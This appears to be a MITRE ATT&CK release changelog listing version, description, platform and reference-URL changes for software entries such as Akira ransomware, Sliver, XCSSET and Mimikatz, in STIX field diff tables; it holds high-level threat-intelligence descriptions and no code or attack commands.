[Akira](https://attack.mitre.org/software/S1129) ransomware, written in C++, is most prominently (but not exclusively) associated with the ransomware-as-a-service entity [Akira](https://attack.mitre.org/groups/G1024). [Akira](https://attack.mitre.org/software/S1129) ransomware has been used in attacks across North America, Europe, and Australia, with a focus on critical infrastructure sectors including manufacturing, education, and IT services. [Akira](https://attack.mitre.org/software/S1129) ransomware employs hybrid encryption and threading to increase the speed and efficiency of encryption and runtime arguments for tailored attacks. Notable variants include Rust-based [Megazord](https://attack.mitre.org/software/S1191) for targeting Windows and [Akira _v2](https://attack.mitre.org/software/S1194) for targeting VMware ESXi servers.(Citation: Kersten Akira 2023)(Citation: CISA Akira Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024)
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | ['Jiraput Thamsongkrah'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-08 17:17:49.947000+00:00 | 2025-03-11 15:37:13.258000+00:00 |
description | [Akira](https://attack.mitre.org/software/S1129) ransomware, written in C++, is most prominently (but not exclusively) associated with the a ransomware-as-a-service entity [Akira](https://attack.mitre.org/groups/G1024).(Citation: Kersten Akira 2023) | [Akira](https://attack.mitre.org/software/S1129) ransomware, written in C++, is most prominently (but not exclusively) associated with the ransomware-as-a-service entity [Akira](https://attack.mitre.org/groups/G1024). [Akira](https://attack.mitre.org/software/S1129) ransomware has been used in attacks across North America, Europe, and Australia, with a focus on critical infrastructure sectors including manufacturing, education, and IT services. [Akira](https://attack.mitre.org/software/S1129) ransomware employs hybrid encryption and threading to increase the speed and efficiency of encryption and runtime arguments for tailored attacks. Notable variants include Rust-based [Megazord](https://attack.mitre.org/software/S1191) for targeting Windows and [Akira _v2](https://attack.mitre.org/software/S1194) for targeting VMware ESXi servers.(Citation: Kersten Akira 2023)(Citation: CISA Akira Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024) |
x_mitre_version | 1.0 | 2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'CISA Akira Ransomware APR 2024', 'description': 'CISA et al. (2024, April 18). #StopRansomware: Akira Ransomware. Retrieved December 10, 2024.', 'url': 'https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf'} |
external_references | | {'source_name': 'Cisco Akira Ransomware OCT 2024', 'description': 'Nutland, J. and Szeliga, M. (2024, October 21). Akira ransomware continues to evolve. Retrieved December 10, 2024.', 'url': 'https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/'} |
[S0633] Sliver
Current version: 2.0
Version changed from: 1.2 → 2.0
Old description:
[Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019)

New description:
[Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control (C2) framework written in Golang. [Sliver](https://attack.mitre.org/software/S0633) includes its own package manager, "armory," for staging and downloading additional tools and payloads to the primary C2 framework.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: Cybereason Sliver Undated)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 00:06:01.264000+00:00 | 2025-03-24 16:00:41.005000+00:00 |
description | [Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019) | [Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control (C2) framework written in Golang. [Sliver](https://attack.mitre.org/software/S0633) includes its own package manager, "armory," for staging and downloading additional tools and payloads to the primary C2 framework.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: Cybereason Sliver Undated) |
x_mitre_version | 1.2 | 2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Cybereason Sliver Undated', 'description': 'Cybereason Global SOC and Incident Response Team. (n.d.). Sliver C2 Leveraged by Many Threat Actors. Retrieved March 24, 2025.', 'url': 'https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors'} |
x_mitre_contributors | | Kyaw Pyiyt Htet, @KyawPyiytHtet |
Minor Version Changes
[S1125] AcidRain
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-12 10:20:50.199000+00:00 | 2025-04-15 19:46:33.099000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1161] BPFDoor
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-23 21:26:40.646000+00:00 | 2025-01-03 18:03:04.670000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[S1118] BUSHWALK
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-28 19:04:24.485000+00:00 | 2025-04-15 19:46:33.793000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S0606] Bad Rabbit
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-12 17:29:57.200000+00:00 | 2025-01-02 19:45:31.402000+00:00 |
description | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos Apr 2019) |
external_references[3]['source_name'] | Dragos IT ICS Ransomware | Dragos Apr 2019 |
external_references[3]['description'] | Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021. | Joe Slowik. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved October 27, 2019. |
external_references[3]['url'] | https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/ | https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[S1070] Black Basta
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-05-01 17:05:56.388000+00:00 | 2025-04-15 19:12:30.748000+00:00 |
external_references[2]['description'] | Cyble. (2022, May 6). New ransomware variant targeting high-value organizations. Retrieved March 7, 2023. | Cyble. (2022, May 6). New ransomware variant targeting high-value organizations. Retrieved November 17, 2024. |
external_references[2]['url'] | https://blog.cyble.com/2022/05/06/black-basta-ransomware/ | https://web.archive.org/web/20220506143054/https://blog.cyble.com/2022/05/06/black-basta-ransomware/ |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Natthawut Saexu |
x_mitre_platforms | | ESXi |
[S0521] BloodHound
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 20:33:37.892000+00:00 | 2025-03-12 20:27:03.654000+00:00 |
x_mitre_version | 1.6 | 1.7 |
[S1105] COATHANGER
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-05 15:31:04.915000+00:00 | 2025-04-15 19:46:33.371000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[1] | Network | Network Devices |
[S1096] Cheerscrypt
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-15 23:22:28.176000+00:00 | 2025-04-15 19:12:30.368000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[S0687] Cyclops Blink
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-15 22:36:30.074000+00:00 | 2025-04-15 19:46:35.048000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[0] | Network | Network Devices |
[S0367] Emotet
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-07-09 16:04:18.570000+00:00 | 2024-11-25 16:00:51.198000+00:00 |
x_mitre_version | 1.6 | 1.7 |
[S1120] FRAMESTING
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-08 20:21:24.195000+00:00 | 2025-04-15 19:46:35.229000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1117] GLASSTOKEN
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-06 19:15:21.887000+00:00 | 2025-04-15 19:46:34.213000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S0357] Impacket
Current version: 1.8
Version changed from: 1.7 → 1.8
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-07 19:08:53.273000+00:00 | 2025-04-04 17:16:12.597000+00:00 |
x_mitre_version | 1.7 | 1.8 |
[S1119] LIGHTWIRE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-28 19:18:39.684000+00:00 | 2025-04-15 19:46:34.303000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1121] LITTLELAMB.WOOLTEA
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-17 20:47:19.566000+00:00 | 2025-04-15 19:46:33.606000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S0576] MegaCortex
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-26 13:39:41.601000+00:00 | 2025-03-10 19:49:50.935000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[S0002] Mimikatz
Current version: 1.10
Version changed from: 1.9 → 1.10
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 20:34:58.387000+00:00 | 2024-11-27 21:53:57.705000+00:00 |
x_mitre_version | 1.9 | 1.10 |
[S0039] Net
Current version: 2.7
Version changed from: 2.6 → 2.7
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-01 04:34:30.855000+00:00 | 2024-11-27 21:55:29.681000+00:00 |
x_mitre_version | 2.6 | 2.7 |
[S1109] PACEMAKER
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-10 21:08:49.143000+00:00 | 2025-04-15 19:46:34.604000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1123] PITSTOP
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-17 23:08:23.989000+00:00 | 2025-04-15 19:46:35.647000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1108] PULSECHECK
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-10 21:06:18.500000+00:00 | 2025-04-15 19:46:34.866000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S0013] PlugX
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-10 17:14:55.086000+00:00 | 2025-04-04 17:15:48.780000+00:00 |
external_references[13]['url'] | http://labs.lastline.com/an-analysis-of-plugx | https://lastline3.rssing.com/chan-29044929/all_p1.html#c29044929a2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 3.1 | 3.2 |
[S1084] QUIETEXIT
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-02 21:29:35.492000+00:00 | 2025-04-15 19:46:34.040000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1113] RAPIDPULSE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-05 18:28:57.216000+00:00 | 2025-04-15 19:46:34.778000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1073] Royal
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-17 13:11:47.488000+00:00 | 2025-04-16 20:38:20.361000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[S1110] SLIGHTPULSE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-10 21:08:18.197000+00:00 | 2025-04-15 19:46:35.556000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1104] SLOWPULSE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-08 19:58:16.715000+00:00 | 2025-04-15 19:46:35.817000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1112] STEADYPULSE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-09 20:26:27.831000+00:00 | 2025-04-15 19:46:35.400000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S0519] SYNful Knock
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-12-14 23:14:26.027000+00:00 | 2025-04-15 19:46:34.695000+00:00 |
external_references[1]['description'] | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.mandiant.com/resources/synful-knock-acis | https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S0183] Tor
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-05 16:37:49.999000+00:00 | 2025-03-25 22:52:49.139000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[S1010] VPNFilter
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-15 22:01:22.169000+00:00 | 2025-04-15 19:46:34.471000+00:00 |
x_mitre_version | 2.0 | 2.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1154] VersaMem
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-28 09:58:35.558000+00:00 | 2025-04-15 19:46:33.283000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1116] WARPWIRE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-29 14:53:25.984000+00:00 | 2025-04-15 19:46:34.954000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S1115] WIREFIRE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-05 18:40:41.264000+00:00 | 2025-04-15 19:46:35.314000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S0658] XCSSET
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-18 20:40:59.749000+00:00 | 2025-04-04 17:39:46.453000+00:00 |
description | [XCSSET](https://attack.mitre.org/software/S0658) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://attack.mitre.org/software/S0658) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.(Citation: trendmicro xcsset xcode project 2020) | [XCSSET](https://attack.mitre.org/software/S0658) is a modular macOS malware family delivered through infected Xcode projects and executed when the project is compiled. Active since August 2020, it has been observed installing backdoors, spoofed browsers, collecting data, and encrypting user files. It is composed of SHC-compiled shell scripts and run-only AppleScripts, often hiding in apps that mimic system tools (such as Xcode, Mail, or Notes) or use familiar icons (like Launchpad) to avoid detection.(Citation: trendmicro xcsset xcode project 2020)(Citation: April 2021 TrendMicro XCSSET)(Citation: Microsoft March 2025 XCSSET) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Microsoft March 2025 XCSSET', 'description': 'Microsoft Threat Intelligence. (2025, March 11). New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects. Retrieved April 2, 2025.', 'url': 'https://www.microsoft.com/en-us/security/blog/2025/03/11/new-xcsset-malware-adds-new-obfuscation-persistence-techniques-to-infect-xcode-projects/'} |
external_references | | {'source_name': 'April 2021 TrendMicro XCSSET', 'description': 'Steven Du, Dechao Zhao, Luis Magisa, Ariel Neimond Lazaro. (2021, April 16). XCSSET Quickly Adapts to macOS 11 and M1-based Macs. Retrieved February 18, 2025.', 'url': 'https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html'} |
[S1114] ZIPLINE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-01 19:26:04.144000+00:00 | 2025-04-15 19:46:35.730000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[S0160] certutil
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-07-27 15:28:27.482000+00:00 | 2024-11-27 21:56:15.800000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
[S0108] netsh
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-01-17 22:14:55.797000+00:00 | 2025-02-25 17:54:17.038000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[S0104] netstat
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-23 19:57:39.135000+00:00 | 2024-11-27 21:54:49.561000+00:00 |
x_mitre_version | 1.3 | 1.4 |
[S0508] ngrok
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-25 18:54:49.773000+00:00 | 2024-11-27 21:35:52.624000+00:00 |
external_references[3]['description'] | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf | https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
Patches
[S0066] 3PARA RAT
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:34:04.031000+00:00 | 2025-04-16 20:38:18.768000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0065] 4H RAT
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 14:46:14.131000+00:00 | 2025-04-16 20:38:22.132000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0677] AADInternals
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-16 20:38:50.579000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0469] ABK
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-24 15:34:14.618000+00:00 | 2025-04-16 20:38:27.718000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0045] ADVSTORESHELL
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 01:44:19.899000+00:00 | 2025-04-16 20:38:45.086000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1028] Action RAT
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-08-24 16:33:12.503000+00:00 | 2025-04-16 20:38:02.568000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0331] Agent Tesla
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-11 20:13:18.738000+00:00 | 2025-04-16 20:38:40.678000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0092] Agent.btz
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 14:50:51.213000+00:00 | 2025-04-16 20:38:03.857000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0584] AppleJeus
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-09-28 17:46:18.677000+00:00 | 2025-04-16 20:38:39.879000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0622] AppleSeed
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-15 20:08:18.786000+00:00 | 2025-04-16 20:37:59.641000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0099] Arp
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-07-25 19:24:08.305000+00:00 | 2025-04-16 20:38:50.933000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1029] AuTo Stealer
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-08-24 16:37:25.008000+00:00 | 2025-04-16 20:38:03.701000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0129] AutoIt backdoor
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 14:52:48.605000+00:00 | 2025-04-16 20:38:43.395000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0640] Avaddon
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 21:41:22.437000+00:00 | 2025-04-16 20:38:10.078000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1053] AvosLocker
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-02-15 17:03:59.324000+00:00 | 2025-04-16 20:37:54.114000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0344] Azorult
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-13 17:42:52.174000+00:00 | 2025-04-16 20:38:44.780000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0031] BACKSPACE
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 14:54:21.256000+00:00 | 2024-11-17 15:05:25.109000+00:00 |
external_references[1]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0245] BADCALL
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:32:03.328000+00:00 | 2025-04-16 20:38:26.720000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0642] BADFLICK
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 11:41:06.816000+00:00 | 2025-04-16 20:38:09.558000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0128] BADNEWS
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-06-21 12:32:12.581000+00:00 | 2025-04-16 20:38:41.446000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0470] BBK
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-24 15:36:00.792000+00:00 | 2025-04-16 20:38:42.578000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0127] BBSRAT
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 14:55:06.553000+00:00 | 2025-04-16 20:38:13.507000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0190] BITSAdmin
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-03 18:31:04.851000+00:00 | 2025-04-16 20:38:52.586000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0069] BLACKCOFFEE
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-04 17:04:35.670000+00:00 | 2024-11-17 15:03:54.770000+00:00 |
external_references[2]['description'] | FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016. | FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved November 17, 2024. |
[S0360] BONDUPDATER
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-02-09 14:06:12.720000+00:00 | 2025-04-16 20:38:37.261000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0114] BOOTRASH
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-06-09 18:58:41.760000+00:00 | 2024-11-17 16:24:43.289000+00:00 |
external_references[3]['description'] | Glyer, C.. (2017, June 22). Boot What?. Retrieved May 4, 2020. | Glyer, C.. (2017, June 22). Boot What?. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf | https://web.archive.org/web/20190926040727/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf |
external_references[1]['description'] | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019. | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf | https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf |
